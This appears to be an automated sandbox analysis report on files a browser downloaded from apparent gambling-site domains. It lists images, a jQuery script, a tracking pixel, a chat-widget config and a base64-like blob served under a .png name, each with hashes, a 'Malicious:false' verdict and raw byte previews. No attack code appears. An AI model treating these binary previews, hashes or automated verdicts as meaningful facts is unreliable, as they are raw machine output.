                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9838D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9828D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2481), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2481
                                                                                                                                                          Entropy (8bit):5.081996364229944
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:1y8dwJlreO3xDC97u+fyxh6FBcTJ+oNb0vVCRNXS4NXS7qfHOZ:iHgg6MTX4WHOZ
                                                                                                                                                          MD5:422480188D0ECE1E4BFFB19A2ACB2DE0
                                                                                                                                                          SHA1:68FB626319A367037AADA62471912DDAD242E642
                                                                                                                                                          SHA-256:93983E295E589B02B8BB8BE77ABFA8A25EFC78B2079A71B67C6ED242E9DD5244
                                                                                                                                                          SHA-512:6FF03E0E31DEFAA2DBF9ED5BD60A1D042B1B45E1948008D0B975D15FE51CE6BC46244397662506EF2C5E5EC692EFA715779DE75114FFA405DFCA10F00103599F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/js/gamebox/components/selectPure.js?v=1717580749344
                                                                                                                                                          Preview:define(["jquery"],function(jquery){return Class.extend({init:function(){var _this=this;_this.bindEvent(_this);_this.initAjaxList(_this)},name:"selectPure",bindEvent:function(_this){$(document).off("change","select",_this._selectChange).on("change","select",{select:_this},_this._selectChange)},_selectChange:function(e){var _this=e.data.select;var _select=$(this);if(_select.attr("relSelectPure")!=null){var _relObj=$(document).find("select[name='"+_select.attr("relSelectPure")+"']");var _value=_select.val();_this.setNull(_this,_relObj,_value);var _url=_relObj.attr("ajaxListPathPure");var _value=_relObj.attr("initValue");_this.ajaxList(_relObj,_url,_value)}if(_select.attr("callback")!=null){e.page=window.page;e.key=_select.val();e.value=_select.html();window.top.topPage.doPageFunction(e,_select.attr("callback"),null)}},initAjaxList:function(_this){$(document).find("[ajaxListPathPure]").each(function(){var _select=$(this);var _url=_select.attr("ajaxListPathPure");var _value=_select.attr("in
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 128 x 526
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):57501
                                                                                                                                                          Entropy (8bit):7.903741547344723
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:twBx7pibt6geixr2uu0chzkF66rpaiWljB:C3YbczMr2PthI86OljB
                                                                                                                                                          MD5:A50BC994387BD2427D313D8A403BDF13
                                                                                                                                                          SHA1:2A5BB4FED78663E312E77FF14D84A9E2A5DC77DC
                                                                                                                                                          SHA-256:7393CD0C086A729A854A00F4111E184918AD142D6888F626C3BEA2AA37B9FBA2
                                                                                                                                                          SHA-512:27947959D004AE6E2AC2943BAB988E28D19C0524139C5D9F8E649CBCF2AA2AFE3B205DDBA5E22F5E3E8C627DF491309EDE4B6AA48001153AC2590280D76E3CB9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/hg128-526.gif
                                                                                                                                                          Preview:GIF89a...........kY.....,oR.....y...h.P......(2H.saWm>...q\..5..n..P../.....(..DJvI.........fR.Q.K;..p.sa...h.g..k.......Q.s..R.....o..!......YH....r\..4.....H..V3?Z.kY.iT....|h....t..I.aM....cQ.q],.l..o.6.yd....V-tdGvij....s.......ce........|.....p..m..8Da.&.3.%..[mqs..[...Q....s.IisG.....UIcs...;j...yd.iT.bL........\.]Q.....'....YE.MAl../T1KVj..xJ2"4.X....v........m..*..P.|h..|...eY......^.POB........,..o..tYC...u.....h............L...}......?......_?;d9|...m^..9..........n.........H.....|...........|a.=..lP....g..t.....i....H~...$-.m^.]N#H......|.}mw.Y.......eV.-9.!.ue...BE%.~....ue..oX.........t\.'bO.....a.nX..f.DO.L=..q.eU.aQ.]M.YI.UE.eQ.Q@.]I....4..QE.aU.UA.YM.QA.UF.YI.]N.QE.aQ.eV.YM.aU.]I.UA.eQ.....U....}m..ut=X]........!..NETSCAPE2.0.....!.......,...............H......*\.....;7.E:....s..W8r..S../.jz.T.F.8o?~.16.F.4.....&...za.....^D......^@v.M..U.7....L5.~...K..4..Z[.GY7j.. .......q.m..9r......89.\.L....-a....M..6m.L...g.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 411 x 178, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):120577
                                                                                                                                                          Entropy (8bit):7.994355950919736
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:3072:vboBLGQI9PI0tFjCltnZ4qesx67INo5ZIUIKTNf8zoeAMZMKgt:vbUy79CB2qesMIW/PIANEzoeFMh
                                                                                                                                                          MD5:960374D51228E8F5DD176DD037CD6982
                                                                                                                                                          SHA1:1BDBFE746EE79FB078E1D1412F5718578713F006
                                                                                                                                                          SHA-256:DD6B3C3B7B820FAF5FE29089682D36DDFF69FF1E0DDF1D6A08C931521E74E077
                                                                                                                                                          SHA-512:FF94B129E1FCAF056A8DC96A6E9F754F4C995B40B41361041C631EBE51145543512BC19A3B93052F513C569A3A7E472E3A75C3DF27D654B87E676819C2FF911C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............Lb.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:E32F6013CDEB11E9B43192D3A21143E0" xmpMM:DocumentID="xmp.did:E32F6014CDEB11E9B43192D3A21143E0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E32F6011CDEB11E9B43192D3A21143E0" stRef:documentID="xmp.did:E32F6012CDEB11E9B43192D3A21143E0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>*,M....qIDATx..}...gu..{..E..UoV.0.%......./..K.%...I..........i6....,K.l...j.}wvvz........ZY.5..?;;;.....}.=.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1823
                                                                                                                                                          Entropy (8bit):7.128143305251574
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:euinNuiVprKeJ3jt7IhEXtPxaRxngxTfKZhpTPr:2NoG7IhE9PEAM/T
                                                                                                                                                          MD5:29FFB1C72B8ABB2705B044AFD206B78F
                                                                                                                                                          SHA1:6409A4B4EBF0F3BFEC03B976629ECF0CAF17BB69
                                                                                                                                                          SHA-256:3C3D8821368D28F376C4CBC0009D73280331BCE3AAE3DD4B3E9819795188E67D
                                                                                                                                                          SHA-512:C9569BA594693AAF2D09B6E3110F4B978BA2C0A532FCB354C71E3ABF730BBF7D901E01B61490D45C5E26E5DD5890AD1263B16CF58580702D85B238507DA8CC87
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_ag.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:1B03F615F77811E79594A93B56FBC396" xmpMM:InstanceID="xmp.iid:1B03F614F77811E79594A93B56FBC396" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a581549a-d504-de42-880f-f1f6b1e4689b" stRef:documentID="adobe:docid:photoshop:fe692dff-f776-11e7-8e5d-cdd6397f58a0"/> </rdf:Description
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):25956
                                                                                                                                                          Entropy (8bit):7.970174820456842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:sx/d21srklvj4IRBmCa//Jt4dhIODq1S9I6W3gf:AOB3a/Rt4dhIsRI6W3gf
                                                                                                                                                          MD5:2BCE0C91243A8C6AF9F2734C62046E91
                                                                                                                                                          SHA1:C54D733AF6149D9B9C125909BE19D7E08E23EB00
                                                                                                                                                          SHA-256:C2C44236B6B88D17AAF3385171CE1A7BBAD8CF9AAC5428E4995F13EDBA258E1D
                                                                                                                                                          SHA-512:8363D759CD2B681E3532B00551DAE280C0A8F3091357E73B02F2005B37EF845FFD091FEBA14FD76AED841B4BD25CEC3ACEB1831090C0CB0FD0A4596765EEC631
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/gc_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:E61647D6616311E7A4EABB69A1A4E81E" xmpMM:InstanceID="xmp.iid:E61647D5616311E7A4EABB69A1A4E81E" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7337d2d7-b8b5-bf4f-bdae-fe34287673e4" stRef:documentID="adobe:docid:photoshop:1ae07fbb-6062-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 108 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3918
                                                                                                                                                          Entropy (8bit):7.803490479933052
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:/YR2KR7+v9qVrjY1EgF1CD9eYUqZKBe7keFQoxASc:AsVqbmCHUqW6kQ9c
                                                                                                                                                          MD5:DDE8F95D4D0D6384CAB07D1D949AB721
                                                                                                                                                          SHA1:6427995625800D26026E77AFD653F559AA6ACD75
                                                                                                                                                          SHA-256:FC52F81976A363BE152257384CA65C7C810891DE38C69748F21EFABFFFBAB79C
                                                                                                                                                          SHA-512:4A7801460EF235259C6D6FB5E81B86311B8A97967468572F48E5EF9B438ADF7CB7F8B6CAF749DF3EF132E478147E40F863B470538C11F7E118155BA1DC442E21
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/member/btn_login_1.png
                                                                                                                                                          Preview:.PNG........IHDR...l...%......1.i....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:FCBBF8AD009611ECBF3F80E83DC11D1C" xmpMM:DocumentID="xmp.did:FCBBF8AE009611ECBF3F80E83DC11D1C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FCBBF8AB009611ECBF3F80E83DC11D1C" stRef:documentID="xmp.did:FCBBF8AC009611ECBF3F80E83DC11D1C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..[K..I...U~..&X..a.{@....#.j...f.ZmV....-.)...{.!....U..s.Q....g.++322>.{.I..w.).?..\.....u...~.[?.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 181 x 429, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):88636
                                                                                                                                                          Entropy (8bit):7.98559741202158
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:9mbjlSQNkR90Nt/591Z+1BoaWaqmQrj3cK3m6igB9lErUhO/BG6gYUrTkYzm:w3AE591Z+1aaWaqmQr7cuzHlEkOZ2YqI
                                                                                                                                                          MD5:8DE445F00E39ADA77A15ABC2E464A2B7
                                                                                                                                                          SHA1:D2C801E8DDC24ABC0431EC3756D3B8FD47D3A992
                                                                                                                                                          SHA-256:874FDB7EFD8F22683541ECC28184C5791F393531ED714A69614F799CDE0EBC83
                                                                                                                                                          SHA-512:F4AAB1141837B7091640DB97D91ECC5524AAF93776BACF865D245E0611E0AE98BF02E35D4FF4A629E9ECD72FE19FA59496ACC4A0491BF18F77081F9DD50FA8B3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/app/01.png
                                                                                                                                                          Preview:.PNG........IHDR.............P.5.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...w.f.U..v8.7W.].9)'.....bl......8.m..##...Nx.s.....`...!...Z.:I......7....?.y..n.+.nI.yN.[7....k..].%x..g.m....;.......g....~.E4.:.h-...P..........8x.5..$.iq+....H.T\.7?X5.).h../.L...p..>.uz....H..?!...G.....b.y..~....r..(.m......*.a[..o.A.|.Q.{.{.y..@."...E\.....W.dx..-..9..0.@.x.[e..j.S....e..E>........l...........K4...I.I.....$..W.Q..X......y|w"o......./..}.y.?.._].}.M.......2.v.>.......V!2 *A......I.51_.O_.'.O.EbQX<,..(..B.Q[i.7p.\...#x........@.o..?#..u..Ma..6B?X......ny..O.o..@W....6.?.O.&.R......?.......g..{.....s?.1`.kn....|.S.W{}<v......Z.:..,...Vi....m....B......)$..b...........H~...l..?.....{.e7j......]2~........N.{o...SW6/./\|...N...u..^..2.?.oK..w.....?.....@.YU.D....|.J...._.N,.....CG.<..<........g_..R.....q.......-.....~.......k.[.g.V6..p.,M.Vw.;q.M~+.n....A.....?..N.....=....=z.....e....g...t......=...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1550
                                                                                                                                                          Entropy (8bit):7.77344193615363
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:3OZJMMm8sG5z3jCJzdIV+7m20U1SHWEdyqkL2E:HMm45LjCLT7m2PU+Lj
                                                                                                                                                          MD5:F3977B4C5DB312A0AAAD659F70CDBB0E
                                                                                                                                                          SHA1:817B13ACE32DFB0C6202068D884F7CA2A4B7D08A
                                                                                                                                                          SHA-256:0FB866F604877ECAA4D8C2FE7E3508ADE5B803A1DB343D598121C77321AD4FF4
                                                                                                                                                          SHA-512:442B12492D48D4210301233D76F89616FAD5079D78A9D149218A6FC6EB35DCB9DA44D78382D6D5ECDE7B29029C88BD6FD4C62523A904148C865A76C70D2B92FB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_dt.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...m&=,8N....I.]-iB"~U*pH%mM'...*.....N8^..B.i5...yC b< l."uD%kG"d?!...6..1........T..*_.0W......C..@.n2.w/o9".....E.V,.r1..@lJ%..;_%...../<W0.}5......;...qP&y..ze,..'{L(s..E.........U$k)....M,.K..(..VJ*6b.7..H'....\AH...n.#/Z.O5E...~../X.()1.<O..>.`0^..}."....6.C...Y.K.....g...A.q:`... )...R.".AT.r:..........I..A...rE0..@.q...luM(.J...Uq..N..W*....O'qB...lmD/.X-h,!s...*......q.9..B"gO%v*.......s`-....r8Q....:r".\....q...iI".St...r;#...sQ)f@"B&.Vz.SF.yh5`.+.>Ud6..@\{f$..s..._!.,..m..{C06l.|..me3.....c....#/b.....zp7G<$oN$\...Ig_.#..._\)B."w..=98,..&:6......X./o@&.T.Q..L.F..A.@.v<..7.g1.a.}^..[,~......._..R..I.H.}=.<..5.s5..4.{3vL,.3!......G......................{..v..t.Ws..p.\.Y.X..O..J..I..G..E.O@.?k08.n/z./x.,n.)g)$Z#....................BQL....tRNS..........? ..........]JD?=9...............................xxojd]WVK;/,'&% ....................................................................................~|tssonmkjcb[ZXSKKIE
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/cc.png?r=2024776064
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1126
                                                                                                                                                          Entropy (8bit):5.47861213127639
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilchF7i+3XRH9oHWLxOCEjMIR46RBobrfjj:Yv1FLJxwewo9E02Lxhg4Tz
                                                                                                                                                          MD5:0FCFC76F2863B3F97A80CCAB1ED7A393
                                                                                                                                                          SHA1:A159FA6509D02078D8DBF5DF092238373F2F4E17
                                                                                                                                                          SHA-256:2B9E4F979B4313A4B840D0E389778160912A4AFE48FBA16C9C6120EEEB05E489
                                                                                                                                                          SHA-512:C227982C96B89AE084B12F636D0E73BB54B41021F5B64A04D917DA1F560E61F47EC6CDBD9BAD4337EA4003B1583AD801EC233B2FEA7297B8E9CBE8DE4E7377AD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', '2bacc0c831e1b000832b0c92c2a0f627');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"uy09","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":"","webPath":"t4045","httpsSupport":0,"analyticsJs":null,"loginLogo":"","name":".....","onlineCustomerServiceUrl":"https://wns1.ywkf89.cc/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/uy09/202307/202307200237350.png","snStatus":1,"webTitle":"......","isMaintain":0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (36160), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):36160
                                                                                                                                                          Entropy (8bit):5.998822724438071
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:t79Ogk5vHGyYjB4uKvrMe9BxmdzbwXFxCyKMPK3MXv:t79OfvHG9t2rH9/mdzCZP6MXv
                                                                                                                                                          MD5:6392F3D66C91EC8BA306FF8CDBA6BBAB
                                                                                                                                                          SHA1:669F595E55137C17C5FDC0F3A0D8C081670F08BD
                                                                                                                                                          SHA-256:31B63D1DD59C138CDC944258A15B281E488B10E3FE3B13F5FA2D0A72B0F29AE1
                                                                                                                                                          SHA-512:B23B9B0C03EE3EC622CB9D0EDA846E0BDFECECC83C97DB5A13A4EF23FD70367DE302A6EB9B6D2D724E6EA3B03FEBA5BCDD35C8664A533E534F50D908FDA9742D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202308/202308232204130.png
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3kp9phrLYy4puCwvnLO1owIOXXWJKpMOJHWV7Z+o3cET+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkbxNAKbLzOkoSRIJ583wBItYGuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KPKur+uOD/6gMaDAzxVzZ6o2pLeZFU1SZ5/KhfAOFea5oNV2XtOYbVE+P57ZZDjxmwk8UQ9nffiOI8VY3sWWFNxUvX2aY+2h4xhGQ8ku2P/o96Y0Im4KTX37ti+8J3H4oj10eLiZGnoESCR2niYeDH5ZVvEiLh7ozZhzgpRL8QhBlozNCRED68sp0UbRnW6NZElRb2L8PavjMots3/M3WdpSiISZlTL8BSNTsx7BcFy67KIiK+Iaq5hP195wunWPa/PH1wYUCxvnMolktfDD3oX5R0Lp8cVkQLBQN5g2pMlSYSkMEyiuV2GxkSL769kLT0WtVIrO/PHfsp3LbaDyrEa5S20tHeCP7HoB+7O5HpQkLakb4oT5Cnv8fiaXGjPRxwNGUNk3ZgETqeQQnRmd1HJaZb1shaX+MB6JvIt2xG3z7V97anjhWRE+9FTPsAoU2uDsT/EmV9hwbtXxBswAotqEwCNjL/JxPDqP//BZW8Qhrs9juxar7YG6CZHyyZi4tl61MJBhFYdpiyCHP3BBQ99SvZY5JBzFmKKWQIqvgDshaIydDDICsoFN8j5DQLnXkxwa8pcFN/s77GQV8DoBfqKC3RYsmvaWTPpZqBGgtqrWsWYzduHh8qiH5AJJw10sZdcK8AtPazS4qyPLE2/KhwX0OgDYR3QsdcgGSqZmBCf3KbMikUUCYA+OXoAE1PDvN/ur0fpRW+OJWVdFkhUefP05cFMs+alijx/qPSwjZXc
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 14 x 17, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):722
                                                                                                                                                          Entropy (8bit):7.337404025343351
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7p8vA4iPpT3fZGkQCET1OlAYx3lYtfhWgOYXuQqZQGtWR5okTaHij90W77yJe:q8vA4iPpTZ8CEYljYtfhWgF+FZQ7HNT3
                                                                                                                                                          MD5:BE10E22D6DE55553F0A4E3235C6415E5
                                                                                                                                                          SHA1:370B465AC5B37F3083FDCEC5D5A16D00A8376F83
                                                                                                                                                          SHA-256:674F80DE0A5378191C0D9DD90FA169687D2EFF98FD21078E7EB687B83DA93FC5
                                                                                                                                                          SHA-512:486E2EB1EEF4C77C8053AA2F66296A9EED00DE913423413D93B5406E304D95951DB1C2312274946136F4D6F25878009E8B021014C7B2C626AA4CB4F574C222C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............m....}PLTE...L.Oc.kU.oH.Tj.j?.XZ....h.w..).....Zr....D..=..-..$h.ha.]k..u.uq.q[s`BIMKG2...q.qc._.......e.....~....E.$...{..t...V*.e..b.Y.*?e.....3...r..n..k..a..]..Q.......h..X.xG......Y..H.*..8..V..[..W..*a..g.g.xWvvl.th.oi.ld.lc.d..b"@V..H[.H..D.VDG.@u.?`.?.w2"V2.o0.~).z(<i&...du....zy..d.EC..k........y.YL..k.O;..d..S.nA.9%....b..a.rD.;"...................M.{D..@.s=.g6. .............tRNS.DOJ?S;.tljjhf^^\\ZZPPF...........IDAT.....DA.......k.m.m.w..>}'.R...../.2..F..Y...G.l\.......-..R.....|.~....F..#....Mf.....Y..I.n{..".|FX..}..i3)FE)!K.1>fQ......d...z,.......5.7.Kek7..O..c..+N.r..7/n..n....../.v..^..2=.....n.p>..s....gfbr.%.....J....98Z.>I+O...I....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):10984
                                                                                                                                                          Entropy (8bit):7.955029283705487
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:+kcsCbN/tG7lJlGmrU4EWvVba26saHfycy6YEynmAMLMVwOQ/1oSu+vh:+LsC1SJwmrbHha/yD6YMjLuVS9vh
                                                                                                                                                          MD5:F76BA00044412F3F098EE50ACB4946AB
                                                                                                                                                          SHA1:E81D6EFE1CEA10D1FFE66DC2D748873966728763
                                                                                                                                                          SHA-256:B3A36A6FDCE3BC086EE6292756DAB5FA23CA16B47449F722CA115DC33281FB85
                                                                                                                                                          SHA-512:31832BC47ED98DCECC5293A83800BE2C7A69E75BAD5F92C1D841FDCDAC955865B2769A2AD73F160E57648DD8CA293A9D798DFD6615134FE1B18C02308774CE75
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/fish_ps.png
